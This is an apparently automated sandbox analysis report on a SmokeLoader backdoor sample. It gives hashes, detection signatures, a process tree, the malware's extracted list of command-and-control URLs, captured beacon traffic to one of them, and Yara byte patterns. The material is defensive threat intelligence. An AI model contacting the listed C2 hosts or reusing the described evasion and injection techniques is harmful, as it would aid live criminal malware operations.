
Windows Analysis Report
vwaoMjcyAw.exe

Overview

General Information

Sample name: vwaoMjcyAw.exe (renamed because original name is a hash value)
Original sample name: 49b527dacc10e6d0e9d2924ecc4e59a8d727d5a2eb89aea324d303f4c8e7ba28.exe
Analysis ID: 1496331
MD5: 5c86694b89a930b319f453e541d17869
SHA1: 3e476f9253d814620a2fa2b9bd19374d420a3c67
SHA256: 49b527dacc10e6d0e9d2924ecc4e59a8d727d5a2eb89aea324d303f4c8e7ba28
Tags: 45-66-231-202, exe, SmokeLoader

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • vwaoMjcyAw.exe (PID: 6940 cmdline: "C:\Users\user\Desktop\vwaoMjcyAw.exe" MD5: 5C86694B89A930B319F453E541D17869)
    • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • ifvwgru (PID: 3248 cmdline: C:\Users\user\AppData\Roaming\ifvwgru MD5: 5C86694B89A930B319F453E541D17869)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution:
  • SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
Extracted malware configuration: {"Version": 2022, "C2 list": ["http://goodfooggooftool.net/index.php", "http://sulugilioiu19.net/index.php", "http://selebration17io.io/index.php", "http://vacantion18ffeu.cc/index.php", "http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}
Yara matches (Source / Rule / Description / Author / Strings), 5 of 12 entries shown:
  • Source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp
    Rule: JoeSecurity_SmokeLoader_2
    Description: Yara detected SmokeLoader
    Author: Joe Security
  • Source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp
    Rule: Windows_Trojan_Smokeloader_4e31426e
    Description: unknown
    Author: unknown
    Strings: 0x6a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
  • Source: 00000006.00000002.2485885145.0000000002C40000.00000040.00001000.00020000.00000000.sdmp
    Rule: Windows_Trojan_Smokeloader_3687686f
    Description: unknown
    Author: unknown
    Strings: 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
  • Source: 00000000.00000002.2270182856.0000000002D02000.00000040.00000020.00020000.00000000.sdmp
    Rule: Windows_Trojan_RedLineStealer_ed346e4c
    Description: unknown
    Author: unknown
    Strings: 0x75ab:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
  • Source: 00000000.00000002.2269300413.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp
    Rule: Windows_Trojan_Smokeloader_3687686f
    Description: unknown
    Author: unknown
    Strings: 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

    System Summary

    Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: C:\Users\user\AppData\Roaming\ifvwgru, CommandLine: C:\Users\user\AppData\Roaming\ifvwgru, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ifvwgru, NewProcessName: C:\Users\user\AppData\Roaming\ifvwgru, OriginalFileName: C:\Users\user\AppData\Roaming\ifvwgru, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Roaming\ifvwgru, ProcessId: 3248, ProcessName: ifvwgru
    Timestamp: 2024-08-21T07:12:54.073227+0200
    SID: 2039103
    Severity: 1
    Source Port: 49717
    Destination Port: 80
    Protocol: TCP
    Classtype: A Network Trojan was detected

    Timestamp: 2024-08-21T07:12:32.808611+0200
    SID: 2039103
    Severity: 1
    Source Port: 49717
    Destination Port: 80
    Protocol: TCP
    Classtype: A Network Trojan was detected

    Timestamp: 2024-08-21T07:12:54.307863+0200
    SID: 2039103
    Severity: 1
    Source Port: 49717
    Destination Port: 80
    Protocol: TCP
    Classtype: A Network Trojan was detected

    Timestamp: 2024-08-21T07:12:33.042264+0200
    SID: 2039103
    Severity: 1
    Source Port: 49717
    Destination Port: 80
    Protocol: TCP
    Classtype: A Network Trojan was detected


    AV Detection

    Source: http://valarioulinity1.net/index.php; Avira URL Cloud: Label: malware
    Source: http://selebration17io.io/; Avira URL Cloud: Label: phishing
    Source: http://vacantion18ffeu.cc/index.php; Avira URL Cloud: Label: malware
    Source: http://goodfooggooftool.net/index.php; Avira URL Cloud: Label: malware
    Source: http://cassiosssionunu.me/index.php; Avira URL Cloud: Label: malware
    Source: http://selebration17io.io/index.php; Avira URL Cloud: Label: malware
    Source: http://sulugilioiu19.net/index.php; Avira URL Cloud: Label: malware
    Source: http://buriatiarutuhuob.net/index.php; Avira URL Cloud: Label: malware
    Source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp; Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://goodfooggooftool.net/index.php", "http://sulugilioiu19.net/index.php", "http://selebration17io.io/index.php", "http://vacantion18ffeu.cc/index.php", "http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}
    Source: selebration17io.io; Virustotal: Detection: 16%
    Source: http://vacantion18ffeu.cc/index.php; Virustotal: Detection: 21%
    Source: http://selebration17io.io/; Virustotal: Detection: 16%
    Source: http://valarioulinity1.net/index.php; Virustotal: Detection: 14%
    Source: http://selebration17io.io/index.php; Virustotal: Detection: 14%
    Source: http://goodfooggooftool.net/index.php; Virustotal: Detection: 15%
    Source: http://buriatiarutuhuob.net/index.php; Virustotal: Detection: 15%
    Source: http://sulugilioiu19.net/index.php; Virustotal: Detection: 13%
    Source: http://cassiosssionunu.me/index.php; Virustotal: Detection: 13%
    Source: C:\Users\user\AppData\Roaming\ifvwgru; ReversingLabs: Detection: 73%
    Source: C:\Users\user\AppData\Roaming\ifvwgru; Virustotal: Detection: 76%
    Source: vwaoMjcyAw.exe; ReversingLabs: Detection: 73%
    Source: vwaoMjcyAw.exe; Virustotal: Detection: 76%
    Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Roaming\ifvwgru; Joe Sandbox ML: detected
    Source: vwaoMjcyAw.exe; Joe Sandbox ML: detected
    Source: vwaoMjcyAw.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exe; File opened: C:\Windows\SysWOW64\msvcr100.dll
    Source: Binary string: C:\dugo_caves\betuw sib.pdb; source: vwaoMjcyAw.exe, ifvwgru.2.dr

    Networking

    Source: Network traffic; Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49717 -> 188.40.141.211:80
    Source: C:\Windows\explorer.exe; Network Connect: 188.40.141.211 80
    Source: Malware configuration extractor; URLs: http://goodfooggooftool.net/index.php
    Source: Malware configuration extractor; URLs: http://sulugilioiu19.net/index.php
    Source: Malware configuration extractor; URLs: http://selebration17io.io/index.php
    Source: Malware configuration extractor; URLs: http://vacantion18ffeu.cc/index.php
    Source: Malware configuration extractor; URLs: http://valarioulinity1.net/index.php
    Source: Malware configuration extractor; URLs: http://buriatiarutuhuob.net/index.php
    Source: Malware configuration extractor; URLs: http://cassiosssionunu.me/index.php
    Source: Joe Sandbox View; IP Address: 188.40.141.211
    Source: Joe Sandbox View; ASN Name: HETZNER-ASDE
    Source: global traffic; HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://atahmsiplorwquuw.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 323 | Host: selebration17io.io
    Source: global traffic; HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://brprnhfudhwwlf.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 357 | Host: selebration17io.io
    Source: global traffic; HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mwqxqnqsqljxlnw.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 364 | Host: selebration17io.io
    Source: global traffic; HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://aeuothcasbr.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 168 | Host: selebration17io.io
    Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic; DNS traffic detected: DNS query: selebration17io.io
    Source: global traffic; DNS traffic detected: DNS query: 56.126.166.20.in-addr.arpa
    Source: unknown; HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://atahmsiplorwquuw.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 323 | Host: selebration17io.io
    Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Content-Length: 7 | Content-Type: application/octet-stream | Date: Wed, 21 Aug 2024 05:12:32 GMT | Data Raw: 03 00 00 00 1f 3d 19 | Data Ascii: =
    Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Content-Length: 0 | Content-Type: application/octet-stream | Date: Wed, 21 Aug 2024 05:12:32 GMT
    Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Content-Length: 7 | Content-Type: application/octet-stream | Date: Wed, 21 Aug 2024 05:12:53 GMT | Data Raw: 03 00 00 00 1f 3d 19 | Data Ascii: =
    Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Content-Length: 0 | Content-Type: application/octet-stream | Date: Wed, 21 Aug 2024 05:12:54 GMT
    Source: explorer.exe, 00000002.00000002.3452125149.000000000C385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979437025.000000000C385000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://aeuothcasbr.com/
    Source: explorer.exe, 00000002.00000002.3452125149.000000000C385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979437025.000000000C385000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://aeuothcasbr.com/application/x-www-form-urlencodedMozilla/5.0
    Source: explorer.exe, 00000002.00000002.3448807647.00000000099AB000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://atahmsiplorwquuw.net/
    Source: explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000978C000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000978C000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000978C000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000978C000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.com0
    Source: explorer.exe, 00000002.00000000.2254640839.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000962B000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
    Source: explorer.exe, 00000002.00000000.2251732709.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3446354300.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3446333236.0000000007B50000.00000002.00000001.00040000.00000000.sdmp; String found in binary or memory: http://schemas.micro
    Source: explorer.exe, 00000002.00000002.3452125149.000000000C385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979437025.000000000C385000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://selebration17io.io/
    Source: explorer.exe, 00000002.00000002.3452963465.0000000010760000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3452941150.0000000010620000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://selebration17io.io/index.php
    Source: explorer.exe, 00000002.00000000.2255032281.00000000099AB000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
    Source: explorer.exe, 00000002.00000002.3451360110.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2256911237.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://android.notify.windows.com/iOS
    Source: explorer.exe, 00000002.00000000.2254640839.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000962B000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com/
    Source: explorer.exe, 00000002.00000000.2254640839.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000962B000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com/I
    Source: explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: explorer.exe, 00000002.00000000.2254640839.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000962B000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
    Source: explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://arc.msn.com
    Source: explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
    Source: explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
    Source: explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
    Source: explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
    Source: explorer.exe, 00000002.00000003.2979925369.000000000C08A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3451553162.000000000C08B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2256911237.000000000C048000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://excel.office.com-
    Source: explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
    Source: explorer.exe, 00000002.00000003.2979925369.000000000C08A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3451553162.000000000C08B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2256911237.000000000C048000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://outlook.come
    Source: explorer.exe, 00000002.00000000.2256911237.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3451360110.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://powerpoint.office.comEMd
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000002.00000002.3448807647.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2255032281.00000000099AB000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://wns.windows.com/e
    Source: explorer.exe, 00000002.00000003.2979925369.000000000C08A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3451553162.000000000C08B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2256911237.000000000C048000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://word.office.comM
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://www.msn.com:443/en-us/feed

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    Source: Yara match; File source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match; File source: 00000006.00000002.2485978515.0000000002CB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match; File source: 00000000.00000002.2269955686.0000000002CD1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match; File source: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match; File source: 00000000.00000002.2269686012.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match; File source: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

    System Summary

    Source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Smokeloader_4e31426e; Author: unknown
    Source: 00000006.00000002.2485885145.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Smokeloader_3687686f; Author: unknown
    Source: 00000000.00000002.2270182856.0000000002D02000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_RedLineStealer_ed346e4c; Author: unknown
    Source: 00000000.00000002.2269300413.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Smokeloader_3687686f; Author: unknown
    Source: 00000006.00000002.2486160796.0000000002EC3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_RedLineStealer_ed346e4c; Author: unknown
    Source: 00000006.00000002.2485978515.0000000002CB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Smokeloader_4e31426e; Author: unknown
    Source: 00000000.00000002.2269955686.0000000002CD1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Smokeloader_4e31426e; Author: unknown
    Source: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Smokeloader_4e31426e; Author: unknown
